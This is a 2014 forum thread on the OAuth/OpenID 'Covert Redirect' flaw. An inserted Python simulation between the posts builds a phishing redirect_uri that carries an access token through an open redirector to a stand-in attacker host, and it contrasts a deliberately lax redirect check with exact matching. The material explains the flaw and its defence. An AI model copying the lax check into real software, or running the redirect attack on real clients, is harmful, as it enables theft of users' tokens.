
Security Flaw Found in OAuth and OpenID


travelin cat

4:59 pm on May 2, 2014 (gmt 0)


Called the "Covert Redirect" flaw, the vulnerability allows hackers to trick users into authorizing an app or site using malicious phishing links. For example, if you visit a site and click a button to log in with Google or Facebook, you'll see the familiar authorization popup. If you authorize the login, your personal data can be sent to the hacker instead of to the site. This can include your email address, contact lists, birthday, and more. The vulnerability could also redirect you to a different look-alike website.

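The flaw summarised in the post above comes down to two things working together: an authorization server that checks the redirect_uri loosely (same domain is good enough) and an open redirector somewhere on the client site. The simulation below is an added example, not code from the post, LifeHacker or any provider; the hostnames app.example and attacker.example, the client id, the /redirect?url= endpoint and the token value are all constructed for the demo. It runs the same authorization request through a lax domain-match check and through an exact-match check and reports which host ends up holding the access token.

```python
"""
Simulated "Covert Redirect" against an OAuth 2.0 implicit-grant authorization
endpoint. Added example with constructed hosts, paths and tokens; it is not
code from any real provider.
"""
from urllib.parse import urlparse, urlsplit, parse_qs, urlencode

# Constructed client registration: the legitimate callback is one exact URL.
REGISTERED_CLIENTS = {
    "client-123": {"redirect_uri": "https://app.example/oauth/callback"},
}


def lax_redirect_ok(client_id, requested_uri):
    """Weak check: any https URL on the registered host is accepted.
    This is the behaviour that makes Covert Redirect possible."""
    registered = urlparse(REGISTERED_CLIENTS[client_id]["redirect_uri"])
    requested = urlparse(requested_uri)
    return requested.scheme == "https" and requested.hostname == registered.hostname


def strict_redirect_ok(client_id, requested_uri):
    """Hardened check: exact string match against the pre-registered URI."""
    return requested_uri == REGISTERED_CLIENTS[client_id]["redirect_uri"]


def authorize(client_id, redirect_uri, check, token="tok-secret-42"):
    """Simulated authorization endpoint after the user clicks "Allow".
    Implicit grant: the access token is returned in the URL fragment.
    Returns the Location the user-agent is sent to, or None if rejected."""
    if client_id not in REGISTERED_CLIENTS or not check(client_id, redirect_uri):
        return None
    return redirect_uri + "#" + urlencode({"access_token": token})


def open_redirector(url):
    """Simulated open redirector at https://app.example/redirect?url=<target>.
    Browsers carry the fragment of the original URL over to a 3xx Location
    that has no fragment of its own (RFC 7231 section 7.1.2), so the token
    rides along to wherever the redirector points."""
    parts = urlsplit(url)
    if parts.hostname == "app.example" and parts.path == "/redirect":
        target = parse_qs(parts.query).get("url", [None])[0]
        if target:
            return target + ("#" + parts.fragment if parts.fragment else "")
    return url  # not the redirector: no redirect happens


def run_flow(check):
    """Phishing link crafted by the attacker, run through one redirect_uri check.
    Returns the hostname that finally receives the token, or None if the
    authorization server refused the redirect_uri."""
    phishing_redirect_uri = "https://app.example/redirect?" + urlencode(
        {"url": "https://attacker.example/collect"}
    )
    location = authorize("client-123", phishing_redirect_uri, check)
    if location is None:
        return None
    final_url = open_redirector(location)
    return urlparse(final_url).hostname


if __name__ == "__main__":
    print("lax check   -> token lands on:", run_flow(lax_redirect_ok))
    print("strict check -> token lands on:", run_flow(strict_redirect_ok))
```

With the lax check the token lands on attacker.example even though the authorization prompt the user saw named the legitimate app; with exact matching the authorization server refuses the request before any redirect happens. That is the provider-side fix the thread is asking for; the client-side fix is to not expose an open redirector at all, and the open redirector is what makes this a client-site problem rather than a flaw in the OAuth or OpenID protocols themselves.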

Robert Charlton

8:04 pm on May 2, 2014 (gmt 0)


From the above LifeHacker article...

Another day, another major internet security flaw (step aside, Heartbleed).

That's going way too far. It's understandable that we're all a bit wary after Heartbleed... but the press is always eager to make hay, and I'm tending to believe Mashable's more careful descriptions of the Covert Redirect flaw....

Another Security Flaw Gets the Heartbleed Treatment, But Don't Believe the Hype
Mashable - May 2, 2014
http://mashable.com/2014/05/02/oauth-openid-not-new-heartbleed/

My emphasis added...
...Already, we're seeing news organizations report this as the next major web security crisis.

Fortunately, Covert Redirect is not the next Heartbleed. In fact, from what we can ascertain, the Covert Redirect "flaw" isn't even new. Moreover, classifying Covert Redirect as a vulnerability with OAuth 2.0 and OpenID is incorrect.

That isn't to say that a potential problem doesn't exist (it does, and we'll discuss how it works), but it is important to understand that this isn't a new discovery and that companies such as LinkedIn, Facebook and Google are already aware of the potential concerns....

It's good to be aware of the potential phishing problem the flaw might create, and to push Facebook and others to come up with a more secure implementation.

A lot of the article has to do with the type of overblown reporting we're likely to see on security matters going forward, which is unfortunate if that makes us blind to real emergencies. Again, this isn't on the Heartbleed level.

I hope we'll see more detail in the coming days.
